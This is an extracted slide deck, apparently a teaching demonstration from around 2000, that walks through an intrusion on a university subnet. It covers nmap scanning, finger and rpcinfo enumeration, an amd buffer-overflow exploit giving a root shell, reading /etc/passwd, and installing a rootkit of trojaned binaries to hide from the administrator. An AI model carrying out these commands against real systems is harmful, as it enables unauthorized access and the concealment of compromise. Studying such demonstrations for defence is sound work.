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BAD-F952-4E99-A19D-79B2706B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8E9-51CE-48E3-B493-D3392BC2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488-0ED9-4E0A-9052-610EDE0D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0CF-4EBA-4C4F-984C-8A8C7137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E09-CD52-470C-949E-298178EA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1D6-2DEC-4A14-B3E1-D2FB6381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DCD-AFE2-4778-957D-0D5D2502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7CF-0734-4D5D-AEDD-D2AEFEF4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DCE-8CDF-4AA3-A767-40E0DCA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5A2-18C1-4A6E-9B8F-7BF1491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CE7-B568-4232-8B85-3C519260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7E7-D1E3-439E-B73B-3744EE2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7E60-567B-4A4F-971C-A8D4EEE819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ntrusion demonstr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aeho O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LUS01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ohhara@postech.edu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can wide area networ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Using powerful network scanner, nma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Find the running hosts in the networ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Gather the host inform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Get root permission from the target hos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ide himself from the admi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can wide area network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Using powerful network scanner, nma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nmap can do ftp bounce scan, stealth scan, OS prediction, and so on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ttp://www.insecure.org/nma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can wide area network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nd the running hosts in the networ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590920"/>
            <a:ext cx="7696440" cy="37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 root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*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 (141.223.xxx.0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  (141.223.xxx.0) seems to be a subnet broadcast address (returned 111 extra pings).  Skipping ho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kwxnxoo.postech.ac.kr (141.223.xxx.7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xojx.postech.ac.kr (141.223.xxx.9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( . . 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victim.postech.ac.kr (141.223.xxx.75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xstxos.postech.ac.kr (141.223.xxx.77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anxelx.postech.ac.kr (141.223.xxx.78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mxrlxns.postech.ac.kr (141.223.xxx.79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 (141.223.xxx.99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 (141.223.xxx.255) appears to be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Host   (141.223.xxx.255) seems to be a subnet broadcast address (returned 93 extra pings).  Skipping ho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Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2 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can wide area network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Gather the host inform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590920"/>
            <a:ext cx="7696440" cy="37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 root@ohhara ~ ] {2} # nmap -I -O 141.223.121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Interesting ports on victim.postech.ac.kr (141.223.xxx.75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Port    State       Protocol  Service         Ow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21      open        tcp        ftp             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23      open        tcp        telnet          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25      open        tcp        smtp            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53      open        tcp        domain          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79      open        tcp        finger          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80      open        tcp        http            no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( . . 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6000    open        tcp        X11             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TCP Sequence Prediction: Class=random positive inc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Difficulty=2098031 (Good luck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Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2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Nmap run completed -- 1 IP address (1 host up) scanned in 19 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can wide area network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Gather the host inform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590920"/>
            <a:ext cx="7696440" cy="37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 root@ohhara ~ ] {3} # finger @141.223.xxx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141.223.xxx.7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Login     Name           Tty   Idle  Login Time   Office     Offic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kotaeji   Kim Taehyung   /0   20:46  Oct 27 19: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 root@ohhara ~ ] {4} # rpcinfo -p 141.223.xxx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program vers proto  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100000    2   tcp    111  rpcb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100000    2   udp    111  rpcb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( . . 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100021    1   udp   1026  nlock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100021    3   udp   1026  nlock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100021    1   tcp   1024  nlock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100021    3   tcp   1024  nlock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300019    1   tcp    878  a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300019    1   udp    879  a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Get root permission from the target hos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Get root with amd buffer overfl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590920"/>
            <a:ext cx="7696440" cy="37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 root@ohhara ~ ] {5} # ./amd-ex 141.223.xxx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Attack 141.223.xxx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amq: could not start new autmount point: Connection timed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Connect to the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Linux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 un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uid=0(root) gid=0(ro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uid=0(root) gid=0(ro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cat /etc/passw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root:x:0:0:root:/root:/bin/b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bin:x:1:1:bin:/bi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daemon:x:2:2:daemon:/sbi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adm:x:3:4:adm:/var/ad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lp:x:4:7:lp:/var/spool/lp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sync:x:5:0:sync:/sbin:/bin/sy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shutdown:x:6:0:shutdown:/sbin:/sbin/shut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( . . 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ide himself from the admi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rootki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rojan files of ohhara rootki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hgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so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666880"/>
            <a:ext cx="76964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 root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.g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 root@victim ~ ] {2} # cd ohhara-rootk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[ root@victim ~/ohhara-rootkit ] {3} # ./install-ohhara-rootk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6:50:14Z</dcterms:created>
  <dc:creator>Taeho Oh</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Taeho Oh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-01-06T13:34:29Z</dcterms:modified>
  <cp:revision>10</cp:revision>
  <dc:subject/>
  <dc:title>Intrusion demonstration Part I</dc:title>
</cp:coreProperties>
</file>